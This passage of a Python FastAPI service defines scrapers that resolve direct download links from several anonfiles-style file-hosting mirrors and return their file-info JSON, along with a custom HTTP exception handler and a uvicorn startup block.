                            "type": (
                                content_type
                                if content_type
                                else "No content type provided by the server."
                            ),
                        },
                        "DateAndTime": (
                            last_modified
                            if last_modified
                            else "No last modified date provided by the server."
                        ),
                    },
                }
            },
        }
    except Exception:
        return {"status": "false", "message": "Invalid Link"}

def _anon_mirror_info(link, api_base):
    # Shared scraper for the anonfiles-style mirrors below: resolve the direct
    # download link from the page, then merge it into the mirror's file-info
    # API response.
    r = requests.get(link)
    soup = BeautifulSoup(r.content, "html.parser")
    direct = str(soup.find("a", {"id": "download-url"}).get("href"))
    file_id = link.split("/", 4)[3]
    jsondata = requests.get(f"{api_base}/v2/file/{file_id}/info").json()
    jsondata["data"]["file"]["url"]["directDownload"] = direct
    del jsondata["data"]["file"]["url"]["full"]
    return jsondata

def anonfiles(link: Union[str, None] = None):
    try:
        return _anon_mirror_info(link, "https://api.anonfiles.com")
    except Exception:
        return {"status": "false", "message": "Invalid Link"}

def filechan(link: Union[str, None] = None):
    try:
        return _anon_mirror_info(link, "https://api.filechan.org")
    except Exception:
        return {"status": "false", "message": "Invalid Link"}

def letsupload(link: Union[str, None] = None):
    try:
        return _anon_mirror_info(link, "https://api.letsupload.cc")
    except Exception:
        return {"status": "false", "message": "Invalid Link"}

def megaupload(link: Union[str, None] = None):
    try:
        return _anon_mirror_info(link, "https://api.megaupload.nz")
    except Exception:
        return {"status": "false", "message": "Invalid Link"}

def myfile(link: Union[str, None] = None):
    try:
        return _anon_mirror_info(link, "https://api.myfile.is")
    except Exception:
        return {"status": "false", "message": "Invalid Link"}

def custom_exception_handler(request: Request, exc: HTTPException) -> JSONResponse:
    error_detail = [{"error": str(exc.detail)}]
    custom_error_model = CustomErrorResponseModel(detail=error_detail)
    return JSONResponse(
        status_code=exc.status_code,
        content=custom_error_model.dict(),
        headers=exc.headers,
    )

# Add the custom exception handler to your FastAPI app
app.add_exception_handler(HTTPException, custom_exception_handler)
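
# A minimal local-run sketch, assuming uvicorn is installed; the host and port
# below are illustrative defaults, not taken from the original file.
if __name__ == "__main__":
    import uvicorn

    uvicorn.run(app, host="0.0.0.0", port=8000)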